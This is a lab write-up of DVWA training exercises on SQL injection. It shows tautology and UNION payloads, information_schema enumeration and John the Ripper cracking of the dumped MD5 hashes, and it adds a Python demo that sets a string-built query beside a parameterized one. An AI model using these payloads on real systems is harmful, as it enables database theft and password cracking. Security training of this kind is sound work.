DVWA Exercises 5
09 SQL Injection

Here we can see an input field that takes a number. The SQL statement in the background could look like this:
select firstname,surname from users where uid='$_GET['id']';
Because the value from the request is pasted straight into the query string, let's try to inject a SQL statement of our own:
1' or '1' = '1

10 SQL Injection with union
With a SQL UNION we can pull data from other tables into the same result set.
The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example:
SELECT a, b FROM table1 UNION SELECT c, d FROM table2
This SQL query will return a single result set with two columns, containing values from columns a and b in table1 and columns c and d in table2.
For a UNION query to work, two key requirements must be met:
The individual queries must return the same number of columns.
The data types in each column must be compatible between the individual queries.
Let's try the following query. The appended SELECT has two columns (user, password) to match the original firstname, surname, and the trailing # is a MySQL line comment, so the single quote left over from the original statement is ignored:
%' or '0'='0' union select user,password from users #
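As an added example (not part of the original exercise), here are the lookups from sections 09 and 10 run against a constructed SQLite users table: the DVWA-style string-built query beside a parameterized one, fed an honest id and the two payloads above. The rows and hash values are constructed placeholders, and because SQLite has no # comment the UNION payload is adapted to end in -- instead.

```python
import sqlite3

# Constructed sample rows standing in for DVWA's users table; the names and the
# "hash" values are placeholders, not DVWA data and not real password hashes.
SAMPLE_USERS = [
    (1, "Alice", "Example", "alice", "constructed-hash-1"),
    (2, "Bob", "Example", "bob", "constructed-hash-2"),
    (3, "Carol", "Example", "carol", "constructed-hash-3"),
]

# Payloads from the exercise text. SQLite has no '#' comment, so the UNION
# payload is adapted to end with '-- ' (MySQL accepts the original '#').
TAUTOLOGY = "1' or '1' = '1"
UNION = "%' or '0'='0' union select user,password from users -- "


def connect():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid INTEGER, firstname TEXT, "
                 "surname TEXT, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors the DVWA statement: the request value is spliced into the SQL
    text, so quotes and keywords inside it are parsed as SQL."""
    sql = f"SELECT firstname, surname FROM users WHERE uid='{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened form: the value is bound as a parameter, so the database only
    ever treats it as data, whatever characters it contains."""
    sql = "SELECT firstname, surname FROM users WHERE uid=?"
    return conn.execute(sql, (user_id,)).fetchall()


def demo():
    """Run both lookups with an honest id and with the two payloads."""
    conn = connect()
    return {
        "vuln_honest": lookup_vulnerable(conn, "1"),              # 1 row
        "vuln_tautology": lookup_vulnerable(conn, TAUTOLOGY),     # every row
        "vuln_union": lookup_vulnerable(conn, UNION),             # names + user/hash pairs
        "safe_honest": lookup_parameterized(conn, "1"),           # 1 row
        "safe_tautology": lookup_parameterized(conn, TAUTOLOGY),  # no rows
        "safe_union": lookup_parameterized(conn, UNION),          # no rows
    }
```

The parameterized lookup returns nothing for either payload because the whole string is compared against uid as a value; it never reaches the SQL parser.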

11 Further Database Enumeration
Most database types (with the notable exception of Oracle) have a set of views called the information schema which provide information about the database.
You can query information_schema.tables to list the tables in the database:
SELECT * FROM information_schema.tables
You can then query information_schema.columns to list the columns in individual tables:
SELECT * FROM information_schema.columns WHERE table_name = 'Users'
Let's try the following query, which again selects two columns to match the original SELECT:
%' or '0'='0' union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS #

12 Crack the password hashes
I put the collected password hashes in a file and try to crack the passwords with John the Ripper.
First, let's check which hash type we have with a tool called hash-identifier. With the hashes identified as unsalted MD5 (John's RAW-MD5 format), run John against the rockyou wordlist:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes.txt
